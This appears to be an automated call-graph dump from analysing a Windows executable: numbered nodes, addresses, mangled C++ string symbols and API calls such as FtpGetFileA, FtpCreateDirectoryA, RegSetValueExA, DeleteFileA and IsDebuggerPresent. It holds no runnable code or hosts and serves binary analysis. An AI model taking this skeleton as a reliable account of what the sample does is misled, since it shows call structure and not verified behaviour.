1181->1183 1184 674789 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1181->1184 1185 6747e5 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1183->1185 1186 6747c4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1183->1186 1276 6736a0 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1184->1276 1191 67481b ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1185->1191 1192 6747fa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1185->1192 1190 6736a0 15 API calls 1186->1190 1187 674bfc 7 API calls 1193 674a29 SetTimer 1187->1193 1194 6747dd 1190->1194 1196 674851 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1191->1196 1197 674830 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1191->1197 1195 6736a0 15 API calls 1192->1195 1221 674bfc 1193->1221 1194->1185 1198 674813 1195->1198 1200 674887 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1196->1200 1201 674866 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1196->1201 1282 673560 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1197->1282 1198->1191 1202 6748bd ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1200->1202 1203 67489c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1200->1203 1205 673560 4 API calls 1201->1205 1208 6748f3 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1202->1208 1209 6748d2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1202->1209 1207 6736a0 15 API calls 1203->1207 1204 674849 1204->1196 1206 67487f 1205->1206 1206->1200 1210 6748b5 1207->1210 1212 674929 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1208->1212 1213 674908 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1208->1213 1211 6736a0 15 API calls 1209->1211 1210->1202 1214 6748eb 1211->1214 1216 674982 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 1212->1216 1217 67493e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1212->1217 1215 673560 4 API calls 1213->1215 1214->1208 1218 674921 1215->1218 1216->1176 1285 6735f0 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1217->1285 1218->1212 1220 67495b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1220->1216 1222 674c06 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 1221->1222 1223 674c04 1221->1223 1225 6751f4 GetCurrentProcess TerminateProcess 1222->1225 1226 6751ec _crt_debugger_hook 1222->1226 1223->1161 1225->1161 1226->1225 1228 671293 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II 1227->1228 1229 671272 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1227->1229 1228->1164 1229->1228 1229->1229 1230->1181 1232 671a56 1231->1232 1233 6714da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1231->1233 1234 674bfc 7 API calls 1232->1234 1289 6712b0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1233->1289 1236 671a70 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1234->1236 1236->1187 1238 671535 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1238->1238 1239 67155a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1238->1239 1240 6715c7 1239->1240 1241 67159d 1239->1241 1243 6715f5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1240->1243 1244 6715d0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1240->1244 1242 6715a0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1241->1242 1242->1240 1242->1242 1245 67165f 1243->1245 1246 671638 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1243->1246 1244->1243 1244->1244 1247 671695 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1245->1247 1248 671670 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1245->1248 1246->1245 1246->1246 1249 6716d6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1247->1249 1250 6716fd 1247->1250 1248->1247 1248->1248 1249->1249 1249->1250 1251 671705 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1250->1251 1252 67172a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1250->1252 1251->1251 1251->1252 1253 671797 1252->1253 1254 67176b 1252->1254 1256 6717c5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1253->1256 1257 6717a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1253->1257 1255 671770 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1254->1255 1255->1253 1255->1255 1258 67182f 1256->1258 1259 671808 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1256->1259 1257->1256 1257->1257 1260 671865 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1258->1260 1261 671840 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1258->1261 1259->1258 1259->1259 1262 6718a6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1260->1262 1263 6718cd 1260->1263 1261->1260 1261->1261 1262->1262 1262->1263 1264 6718d5 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1263->1264 1265 6718fa ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1263->1265 1264->1264 1264->1265 1266 671967 1265->1266 1267 67193d 1265->1267 1268 671995 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1266->1268 1270 671970 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1266->1270 1269 671940 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1267->1269 1271 671a07 1268->1271 1272 6719de 1268->1272 1269->1266 1269->1269 1270->1268 1270->1270 1274 671a35 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1271->1274 1275 671a10 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1271->1275 1273 6719e0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1272->1273 1273->1271 1273->1273 1274->1232 1275->1274 1275->1275 1277 6736f7 6 API calls 1276->1277 1278 67374e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1276->1278 1279 67375f 1277->1279 1278->1279 1280 674bfc 7 API calls 1279->1280 1281 673777 1280->1281 1281->1183 1283 6735b6 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1282->1283 1284 6735ce ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1282->1284 1283->1204 1284->1204 1286 673643 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1285->1286 1287 673660 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1285->1287 1288 67366d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1286->1288 1287->1288 1288->1220 1290 6712e3 1289->1290 1291 6712c2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1289->1291 1290->1238 1290->1239 1291->1290 1291->1291 1512 671839 1513 671840 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1512->1513 1513->1513 1514 671865 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1513->1514 1515 6718a6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1514->1515 1516 6718cd 1514->1516 1515->1515 1515->1516 1517 6718d5 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1516->1517 1518 6718fa ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1516->1518 1517->1517 1517->1518 1519 671967 1518->1519 1520 67193d 1518->1520 1521 671995 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1519->1521 1523 671970 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1519->1523 1522 671940 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1520->1522 1524 671a07 1521->1524 1525 6719de 1521->1525 1522->1519 1522->1522 1523->1521 1523->1523 1527 671a35 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1524->1527 1528 671a10 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1524->1528 1526 6719e0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1525->1526 1526->1524 1526->1526 1529 671a56 1527->1529 1528->1527 1528->1528 1530 674bfc 7 API calls 1529->1530 1531 671a70 1530->1531 1532 674e38 1553 675208 1532->1553 1534 674e44 GetStartupInfoA 1535 674e72 InterlockedCompareExchange 1534->1535 1536 674e80 1535->1536 1537 674e84 1535->1537 1536->1537 1538 674e8b Sleep 1536->1538 1539 674ea4 _amsg_exit 1537->1539 1540 674eae 1537->1540 1538->1535 1541 674ed7 1539->1541 1540->1541 1542 674eb7 _initterm_e 1540->1542 1544 674ee6 _initterm 1541->1544 1545 674f01 1541->1545 1542->1541 1543 674ed2 __onexit 1542->1543 1544->1545 1546 674f05 InterlockedExchange 1545->1546 1547 674f0d __IsNonwritableInCurrentImage 1545->1547 1546->1547 1548 674f9c _ismbblead 1547->1548 1550 674f86 exit 1547->1550 1551 674fe1 1547->1551 1554 671380 LoadStringA LoadStringA 1547->1554 1548->1547 1550->1547 1551->1543 1552 674fea _cexit 1551->1552 1552->1543 1553->1534 1564 674470 LoadIconA LoadCursorA LoadIconA RegisterClassExA 1554->1564 1556 6713ae CreateWindowExA 1557 671472 1556->1557 1558 6713ea ShowWindow UpdateWindow LoadAcceleratorsA GetMessageA 1556->1558 1557->1547 1559 671464 1558->1559 1560 67141c 1558->1560 1559->1547 1561 671430 TranslateAcceleratorA 1560->1561 1562 671453 GetMessageA 1561->1562 1563 671441 TranslateMessage DispatchMessageA 1561->1563 1562->1559 1562->1561 1563->1562 1564->1556 1698 675603 1699 674bfc 7 API calls 1698->1699 1700 675614 1699->1700 1705 675017 1706 675025 __set_app_type _encode_pointer __p__fmode __p__commode 1705->1706 1708 6750c4 _pre_c_init __RTC_Initialize 1706->1708 1709 6750d2 __setusermatherr 1708->1709 1710 6750de 1708->1710 1709->1710 1715 6754aa _controlfp_s 1710->1715 1713 6750f5 1714 6750ec _configthreadlocale 1714->1713 1716 6754c6 _invoke_watson 1715->1716 1717 6750e3 1715->1717 1716->1717 1717->1713 1717->1714 1720 675c10 1721 675c2b 1720->1721 1722 674d15 _pre_cpp_init 10 API calls 1721->1722 1723 675c35 1722->1723 1729 6752e0 SetUnhandledExceptionFilter 1731 674ded 1732 674d15 _pre_cpp_init 10 API calls 1731->1732 1733 674df7 __getmainargs 1732->1733 1734 674e37 1733->1734 1735 674e2f _amsg_exit 1733->1735 1735->1734 1739 6755e9 1740 6755f5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1739->1740 1741 675602 1739->1741 1740->1741 1744 6750f8 1747 6754d8 1744->1747 1746 6750fd 1746->1746 1748 6754fd 1747->1748 1749 67550a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1747->1749 1748->1749 1750 675501 1748->1750 1749->1750 1750->1746 1751 674fc6 1752 674fe1 1751->1752 1753 674fda _exit 1751->1753 1754 674fea _cexit 1752->1754 1755 674ff0 __onexit 1752->1755 1753->1752 1754->1755 1758 674bc0 1759 674bf4 1758->1759 1760 674bcb 1758->1760 1761 674be0 1760->1761 1762 674be5 EndDialog 1760->1762 1762->1759 1857 6755a0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1871 6755b2 1872 674bfc 7 API calls 1871->1872 1873 6755c3 1872->1873 1874 674bfc 7 API calls 1873->1874 1875 6755d0 1874->1875 1876 674fb2 _XcptFilter 1292 6741b0 DeleteFileA GetLocalTime InternetOpenA InternetConnectA 1293 674433 1292->1293 1294 674249 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1292->1294 1296 671480 85 API calls 1293->1296 1323 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1294->1323 1298 674438 1296->1298 1297 674262 1324 673b90 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1297->1324 1300 674bfc 7 API calls 1298->1300 1301 674464 1300->1301 1303 671260 4 API calls 1304 6742ae ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA 1303->1304 1305 6742e3 1304->1305 1306 6742ca ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1304->1306 1369 671cb0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1305->1369 1368 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1306->1368 1310 6742f9 1313 67432b RegOpenKeyExA memset RegQueryValueExA 1310->1313 1316 674326 1310->1316 1320 674321 1310->1320 1312 674407 InternetCloseHandle InternetCloseHandle ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1312->1293 1314 674385 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 1313->1314 1315 6743dc ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 1313->1315 1317 6743ac RegSetValueExA 1314->1317 1318 67439c ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 1314->1318 1315->1316 1316->1312 1470 673790 memset 1316->1470 1317->1316 1318->1317 1404 6724f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1320->1404 1323->1297 1325 673c47 1324->1325 1326 673c1b 1324->1326 1328 673e27 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpGetFileA 1325->1328 1329 673c6a ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpGetFileA 1325->1329 1327 673c20 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1326->1327 1327->1325 1327->1327 1330 673e50 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen fopen memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1328->1330 1331 6740e9 8 API calls 1328->1331 1332 674164 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1329->1332 1333 673c8b ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen fopen memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1329->1333 1334 673eb5 fgetc 1330->1334 1331->1332 1335 674bfc 7 API calls 1332->1335 1336 673cf6 fgetc 1333->1336 1337 674033 1334->1337 1338 673ec9 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1334->1338 1339 67419a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1335->1339 1340 673d94 1336->1340 1341 673d09 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1336->1341 1343 674038 feof 1337->1343 1344 673f4e ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1338->1344 1345 673eed ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1338->1345 1339->1303 1342 673d99 feof 1340->1342 1346 673d5f ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fprintf 1341->1346 1347 673d2d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1341->1347 1342->1336 1348 673dac 8 API calls 1342->1348 1343->1334 1349 67404c 11 API calls 1343->1349 1352 673fa5 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1344->1352 1353 673f63 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1344->1353 1488 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1345->1488 1354 673d7d memset 1346->1354 1351 6736a0 15 API calls 1347->1351 1348->1332 1349->1332 1358 673d46 fprintf 1351->1358 1355 67401c memset 1352->1355 1356 673fba ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1352->1356 1359 6736a0 15 API calls 1353->1359 1354->1342 1355->1343 1489 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1356->1489 1357 673f06 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1361 6736a0 15 API calls 1357->1361 1358->1354 1365 673f1c 1359->1365 1361->1365 1362 673fd3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1364 6736a0 15 API calls 1362->1364 1363 671480 85 API calls 1363->1365 1364->1365 1365->1355 1365->1363 1366 67400e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1365->1366 1490 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1366->1490 1368->1305 1370 671260 4 API calls 1369->1370 1371 671d35 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpGetFileA 1370->1371 1372 672096 14 API calls 1371->1372 1373 671d5e 14 API calls 1371->1373 1376 6721a6 DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1372->1376 1374 671e80 fgetc 1373->1374 1375 671e4b 1373->1375 1377 671e96 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1374->1377 1378 671e77 1374->1378 1379 671e50 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1375->1379 1380 674bfc 7 API calls 1376->1380 1381 671ec6 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1377->1381 1382 671f4b fprintf fprintf 1377->1382 1378->1374 1383 671f34 feof 1378->1383 1379->1378 1379->1379 1384 6721e7 1380->1384 1385 671fb4 fprintf fprintf 1381->1385 1391 671edf 1381->1391 1386 67201a fprintf fprintf 1382->1386 1383->1374 1387 671f46 1383->1387 1384->1310 1393 6721f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1384->1393 1385->1386 1390 672030 7 API calls 1386->1390 1387->1390 1388 671ee6 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fprintf 1389 671efe ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1388->1389 1389->1391 1392 671f18 memset 1389->1392 1390->1376 1391->1388 1391->1389 1391->1392 1392->1383 1491 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1393->1491 1395 672243 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1396 671260 4 API calls 1395->1396 1397 67228a 12 API calls 1396->1397 1492 671a80 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1397->1492 1400 671a80 33 API calls 1401 672467 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1400->1401 1402 674bfc 7 API calls 1401->1402 1403 6724d0 1402->1403 1403->1310 1502 6712f0 